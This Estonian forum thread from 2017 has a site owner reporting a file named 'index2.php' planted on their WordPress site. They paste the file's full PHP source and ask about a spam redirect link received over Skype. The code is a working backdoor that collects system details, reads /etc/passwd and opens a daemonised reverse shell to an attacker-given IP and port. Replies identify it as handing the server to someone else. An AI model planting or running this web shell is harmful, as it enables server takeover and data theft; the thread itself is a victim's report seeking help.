praegune kellaaeg 28.03.2024 23:23:09
|
Hinnavaatlus
:: Foorum
:: Uudised
:: Ärifoorumid
:: HV F1 ennustusvõistlus
:: Pangalink
:: Telekavad
:: HV toote otsing
|
|
autor |
sõnum |
|
sakunne
HV veteran
liitunud: 15.12.2004
|
22.03.2017 14:56:17
Skype ja WP spämm |
|
|
1. WP lehele tellis fail "index2.php" järgneva sisuga
Spoiler
<?php
if(isset($_POST['who'])) {
$ans = array();
$ans['release'] = @shell_exec("cat /etc/*release");
$ans['uname'] = @shell_exec("uname -a");
$ans['id'] = @shell_exec("id");
$ans['pwd'] = @shell_exec("pwd");
$ans['passwd'] = @shell_exec("cat /etc/passwd");
$ans['gcc'] = @shell_exec("which gcc");
$ans['make'] = @shell_exec("which make");
$ans['perl'] = @shell_exec("which perl");
$ans['python'] = @shell_exec("which python");
$ans['wget'] = @shell_exec("which wget");
$ans['links'] = @shell_exec("which links");
$ans['lynx'] = @shell_exec("which lynx");
$ans['curl'] = @shell_exec("which curl");
$ans['ifconfig'] = @shell_exec("/sbin/ifconfig");
echo base64_encode(serialize($ans));
exit;
} else if(!isset($_POST['init'])) {
exit;
}
ini_set('display_errors', 'on');
ini_set('log_error', 'off');
error_reporting(E_ALL);
set_time_limit(0);
$VERSION = "1.0";
list($ip, $port) = unserialize(base64_decode($_POST['init']));
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if(function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if(posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if(!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if(!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while(1) {
// Check for end of TCP connection
if(feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if(feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if(in_array($sock, $read_a)) {
if($debug)
printit("SOCK READ");
$input = fread($sock, $chunk_size);
if($debug)
printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if(in_array($pipes[1], $read_a)) {
if($debug)
printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if($debug)
printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if(in_array($pipes[2], $read_a)) {
if($debug)
printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if($debug)
printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit($string) {
if(!$daemon) {
print "$string\n";
}
}
|
Lihtsalt huviks ja kommenteerimisks
2. Viimasel ajal olen Skype kontaktidelt saanud sellelaadseid sõnumeid
https://www.baidu.com/link?url=zLHau35SxoefdU9nD2ySFgm6k9NL33U5qf7YkQ-K-Y3&id=sakunne |
On keegi proovinud, mida viimane teeb v huvitab kedagi
_________________ Kuna ei pruugi õigel ajal foorumisse sattuda:
SMS: 5051598 [võõraid tel. ei vasta]
Email sakunne@seenior.ee
viimati muutis sakunne 22.03.2017 15:22:07, muudetud 1 kord |
|
Kommentaarid: 77 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
69 |
|
tagasi üles |
|
|
A.S.
HV Guru
liitunud: 26.10.2003
|
22.03.2017 15:19:01
|
|
|
Tavaline https://www.baidu.com/ otsingu link, mingile mõttetule saidile satud, mis siis omakorda suunab edasi. http://letprint.ru/ => http://todaydates31.com/. Sealt saad teada, kuidas kiirelt rikkaks saada.
|
|
Kommentaarid: 33 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
33 |
|
tagasi üles |
|
|
olavsu1
külaline
|
26.03.2017 23:28:37
|
|
|
selle esimese asjaga läheb server kellegi teise kontrollialla...
|
|
tagasi üles |
|
|
|
lisa lemmikuks |
|
|
sa ei või postitada uusi teemasid siia foorumisse sa ei või vastata selle foorumi teemadele sa ei või muuta oma postitusi selles foorumis sa ei või kustutada oma postitusi selles foorumis sa ei või vastata küsitlustele selles foorumis sa ei saa lisada manuseid selles foorumis sa võid manuseid alla laadida selles foorumis
|
|
Hinnavaatlus ei vastuta foorumis tehtud postituste eest.
|